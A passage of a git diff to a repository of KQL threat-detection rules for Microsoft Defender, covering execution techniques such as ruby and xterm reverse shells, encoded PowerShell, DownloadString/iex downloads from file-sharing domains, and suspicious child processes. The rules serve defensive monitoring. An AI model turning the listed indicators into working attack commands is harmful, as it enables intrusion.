+// Level: medium +// Description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains " ash" or ProcessCommandLine contains " bash" or ProcessCommandLine contains " bsh" or ProcessCommandLine contains " csh" or ProcessCommandLine contains " ksh" or ProcessCommandLine contains " pdksh" or ProcessCommandLine contains " sh" or ProcessCommandLine contains " tcsh") and (ProcessCommandLine contains " -e" and ProcessCommandLine contains "rsocket" and ProcessCommandLine contains "TCPSocket") and FolderPath contains "ruby" \ No newline at end of file diff --git a/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql b/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql index b303daba..2244e747 100644 --- a/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql +++ b/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql @@ -1,12 +1,12 @@ -// Title: Potential ShellDispatch.DLL Functionality Abuse -// Author: X__Junior (Nextron Systems) -// Date: 2023-06-20 -// Level: medium -// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential ShellDispatch.DLL Functionality Abuse +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-20 +// Level: medium +// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql b/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql index 52b1b857..65341000 100644 --- a/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql +++ b/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql @@ -1,12 +1,12 @@ -// Title: Potential Suspicious Browser Launch From Document Reader Process -// Author: Joseph Kamau -// Date: 2024-05-27 -// Level: medium -// Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002 -// False Positives: -// - Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed. - -DeviceProcessEvents +// Title: Potential Suspicious Browser Launch From Document Reader Process +// Author: Joseph Kamau +// Date: 2024-05-27 +// Level: medium +// Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed. + +DeviceProcessEvents | where (ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\maxthon.exe" or FolderPath endswith "\\seamonkey.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath contains "Acrobat Reader" or InitiatingProcessFolderPath contains "Microsoft Office" or InitiatingProcessFolderPath contains "PDF Reader")) and (not(ProcessCommandLine contains "https://go.microsoft.com/fwlink/")) and (not(((ProcessCommandLine contains "http://ad.foxitsoftware.com/adlog.php") or (ProcessCommandLine contains "https://globe-map.foxitservice.com/go.php" and ProcessCommandLine contains "do=redirect")))) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql index e960299f..dbbbbe1e 100644 --- a/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-20 -// Level: medium -// Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where (ProcessCommandLine contains " service get " and ProcessCommandLine contains "name,displayname,pathname,startmode") and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql b/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql index a7e6cfb4..cccb816c 100644 --- a/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql +++ b/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql @@ -1,12 +1,12 @@ -// Title: Potential WinAPI Calls Via CommandLine -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-06 -// Level: high -// Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1106 -// False Positives: -// - Some legitimate action or applications may use these functions. Investigate further to determine the legitimacy of the activity. - -DeviceProcessEvents +// Title: Potential WinAPI Calls Via CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-06 +// Level: high +// Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1106 +// False Positives: +// - Some legitimate action or applications may use these functions. Investigate further to determine the legitimacy of the activity. + +DeviceProcessEvents | where (ProcessCommandLine contains "AddSecurityPackage" or ProcessCommandLine contains "AdjustTokenPrivileges" or ProcessCommandLine contains "Advapi32" or ProcessCommandLine contains "CloseHandle" or ProcessCommandLine contains "CreateProcessWithToken" or ProcessCommandLine contains "CreatePseudoConsole" or ProcessCommandLine contains "CreateRemoteThread" or ProcessCommandLine contains "CreateThread" or ProcessCommandLine contains "CreateUserThread" or ProcessCommandLine contains "DangerousGetHandle" or ProcessCommandLine contains "DuplicateTokenEx" or ProcessCommandLine contains "EnumerateSecurityPackages" or ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "FreeLibrary" or ProcessCommandLine contains "GetDelegateForFunctionPointer" or ProcessCommandLine contains "GetLogonSessionData" or ProcessCommandLine contains "GetModuleHandle" or ProcessCommandLine contains "GetProcAddress" or ProcessCommandLine contains "GetProcessHandle" or ProcessCommandLine contains "GetTokenInformation" or ProcessCommandLine contains "ImpersonateLoggedOnUser" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "LoadLibrary" or ProcessCommandLine contains "memcpy" or ProcessCommandLine contains "MiniDumpWriteDump" or ProcessCommandLine contains "ntdll" or ProcessCommandLine contains "OpenDesktop" or ProcessCommandLine contains "OpenProcess" or ProcessCommandLine contains "OpenProcessToken" or ProcessCommandLine contains "OpenThreadToken" or ProcessCommandLine contains "OpenWindowStation" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "QueueUserApc" or ProcessCommandLine contains "ReadProcessMemory" or ProcessCommandLine contains "RevertToSelf" or ProcessCommandLine contains "RtlCreateUserThread" or ProcessCommandLine contains "secur32" or ProcessCommandLine contains "SetThreadToken" or ProcessCommandLine contains "VirtualAlloc" or ProcessCommandLine contains "VirtualFree" or ProcessCommandLine contains "VirtualProtect" or ProcessCommandLine contains "WaitForSingleObject" or ProcessCommandLine contains "WriteInt32" or ProcessCommandLine contains "WriteProcessMemory" or ProcessCommandLine contains "ZeroFreeGlobalAllocUnicode") and (not((((ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "CloseHandle") and InitiatingProcessFolderPath endswith "\\CompatTelRunner.exe") or (ProcessCommandLine contains "GetLoadLibraryWAddress32" and FolderPath endswith "\\MpCmdRun.exe")))) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql b/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql index 6af3f015..6cc17ee5 100644 --- a/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql +++ b/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql @@ -1,14 +1,14 @@ -// Title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell -// Author: Markus Neis @Karneades -// Date: 2019-04-03 -// Level: medium -// Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047, attack.t1059.001 -// False Positives: -// - AppvClient -// - CCM -// - WinRM - -DeviceProcessEvents +// Title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell +// Author: Markus Neis @Karneades +// Date: 2019-04-03 +// Level: medium +// Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.t1059.001 +// False Positives: +// - AppvClient +// - CCM +// - WinRM + +DeviceProcessEvents | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/potential_xterm_reverse_shell.kql b/KQL/rules/Execution/potential_xterm_reverse_shell.kql index 1c1b667c..2fd1ef34 100644 --- a/KQL/rules/Execution/potential_xterm_reverse_shell.kql +++ b/KQL/rules/Execution/potential_xterm_reverse_shell.kql @@ -1,10 +1,10 @@ -// Title: Potential Xterm Reverse Shell -// Author: @d4ns4n_ -// Date: 2023-04-24 -// Level: medium -// Description: Detects usage of "xterm" as a potential reverse shell tunnel -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Potential Xterm Reverse Shell +// Author: @d4ns4n_ +// Date: 2023-04-24 +// Level: medium +// Description: Detects usage of "xterm" as a potential reverse shell tunnel +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where ProcessCommandLine contains "-display" and ProcessCommandLine endswith ":1" and FolderPath contains "xterm" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql b/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql index 4ccb7247..a74ccf6c 100644 --- a/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql +++ b/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Child Process Of ClickOnce Application -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-12 -// Level: medium -// Description: Detects potentially suspicious child processes of a ClickOnce deployment application -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion - -DeviceProcessEvents +// Title: Potentially Suspicious Child Process Of ClickOnce Application +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects potentially suspicious child processes of a ClickOnce deployment application +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion + +DeviceProcessEvents | where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql b/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql index f4afef5e..7d42e55a 100644 --- a/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql +++ b/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Child Process Of VsCode -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-26 -// Level: medium -// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 -// False Positives: -// - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly - -DeviceProcessEvents +// Title: Potentially Suspicious Child Process Of VsCode +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-26 +// Level: medium +// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 +// False Positives: +// - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql b/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql index 816df51d..ee470fcf 100644 --- a/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql +++ b/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Child Process Of WinRAR.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-31 -// Level: medium -// Description: Detects potentially suspicious child processes of WinRAR.exe. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1203 - -DeviceProcessEvents +// Title: Potentially Suspicious Child Process Of WinRAR.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-31 +// Level: medium +// Description: Detects potentially suspicious child processes of WinRAR.exe. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203 + +DeviceProcessEvents | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\WinRAR.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql b/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql index 877e0a90..c557a628 100644 --- a/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql +++ b/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql @@ -1,11 +1,11 @@ -// Title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry -// Author: Ahmed Farouk, Nasreddine Bencherchali -// Date: 2024-11-01 -// Level: high -// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. -// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceRegistryEvents +// Title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry +// Author: Ahmed Farouk, Nasreddine Bencherchali +// Date: 2024-11-01 +// Level: high +// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. +// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceRegistryEvents | where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" and (((RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and (RegistryValueData contains " -e " or RegistryValueData contains " -ec " or RegistryValueData contains " -en " or RegistryValueData contains " -enc " or RegistryValueData contains " -enco" or RegistryValueData contains "ftp" or RegistryValueData contains "Hidden" or RegistryValueData contains "http" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-")) or (RegistryValueData contains "wmic" and (RegistryValueData contains "shadowcopy" or RegistryValueData contains "process call create"))) \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql b/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql index 3ff906ba..2da6049e 100644 --- a/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql +++ b/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Electron Application CommandLine -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-05 -// Level: medium -// Description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Legitimate usage for debugging purposes - -DeviceProcessEvents +// Title: Potentially Suspicious Electron Application CommandLine +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-05 +// Level: medium +// Description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate usage for debugging purposes + +DeviceProcessEvents | where (ProcessCommandLine contains "--browser-subprocess-path" or ProcessCommandLine contains "--gpu-launcher" or ProcessCommandLine contains "--renderer-cmd-prefix" or ProcessCommandLine contains "--utility-cmd-prefix") and ((FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\code.exe" or FolderPath endswith "\\discord.exe" or FolderPath endswith "\\GitHubDesktop.exe" or FolderPath endswith "\\keybase.exe" or FolderPath endswith "\\msedge_proxy.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\slack.exe" or FolderPath endswith "\\Teams.exe") or (ProcessVersionInfoOriginalFileName in~ ("chrome.exe", "code.exe", "discord.exe", "GitHubDesktop.exe", "keybase.exe", "msedge_proxy.exe", "msedge.exe", "msedgewebview2.exe", "msteams.exe", "slack.exe", "Teams.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql b/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql index 43299eac..34615381 100644 --- a/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql +++ b/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Execution Of PDQDeployRunner -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-22 -// Level: medium -// Description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Legitimate use of the PDQDeploy tool to execute these commands - -DeviceProcessEvents +// Title: Potentially Suspicious Execution Of PDQDeployRunner +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-22 +// Level: medium +// Description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate use of the PDQDeploy tool to execute these commands + +DeviceProcessEvents | where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\TEMP\\" or FolderPath contains "\\AppData\\Local\\Temp") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -encodedcommand " or ProcessCommandLine contains " -w hidden" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "http" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-")) and InitiatingProcessFolderPath contains "\\PDQDeployRunner-" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql b/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql index b018e74b..a486363a 100644 --- a/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql +++ b/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-02-23 -// Level: high -// Description: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: high +// Description: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql b/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql index 099c6c56..78f70d80 100644 --- a/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql +++ b/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Inline JavaScript Execution via NodeJS Binary -// Author: Microsoft (idea), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-04-21 -// Level: medium -// Description: Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.007 -// False Positives: -// - Legitimate scripts using Node.js with these modules - -DeviceProcessEvents +// Title: Potentially Suspicious Inline JavaScript Execution via NodeJS Binary +// Author: Microsoft (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-21 +// Level: medium +// Description: Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.007 +// False Positives: +// - Legitimate scripts using Node.js with these modules + +DeviceProcessEvents | where (ProcessCommandLine contains "http" and ProcessCommandLine contains "execSync" and ProcessCommandLine contains "spawn" and ProcessCommandLine contains "fs" and ProcessCommandLine contains "path" and ProcessCommandLine contains "zlib") and (FolderPath endswith "\\node.exe" or ProcessVersionInfoOriginalFileName =~ "node.exe" or ProcessVersionInfoProductName =~ "Node.js") \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql b/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql index 5241b710..d4000a62 100644 --- a/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql +++ b/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Named Pipe Created Via Mkfifo -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-16 -// Level: medium -// Description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Potentially Suspicious Named Pipe Created Via Mkfifo +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: medium +// Description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ProcessCommandLine contains " /tmp/" and FolderPath endswith "/mkfifo" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql b/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql index de91eb39..d9e979b2 100644 --- a/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql +++ b/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious WebDAV LNK Execution -// Author: Micah Babinski -// Date: 2023-08-21 -// Level: medium -// Description: Detects possible execution via LNK file accessed on a WebDAV server. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.t1204 - -DeviceProcessEvents +// Title: Potentially Suspicious WebDAV LNK Execution +// Author: Micah Babinski +// Date: 2023-08-21 +// Level: medium +// Description: Detects possible execution via LNK file accessed on a WebDAV server. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.t1204 + +DeviceProcessEvents | where ProcessCommandLine contains "\\DavWWWRoot\\" and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\explorer.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_as_a_service_in_registry.kql b/KQL/rules/Execution/powershell_as_a_service_in_registry.kql index c1021955..72677325 100644 --- a/KQL/rules/Execution/powershell_as_a_service_in_registry.kql +++ b/KQL/rules/Execution/powershell_as_a_service_in_registry.kql @@ 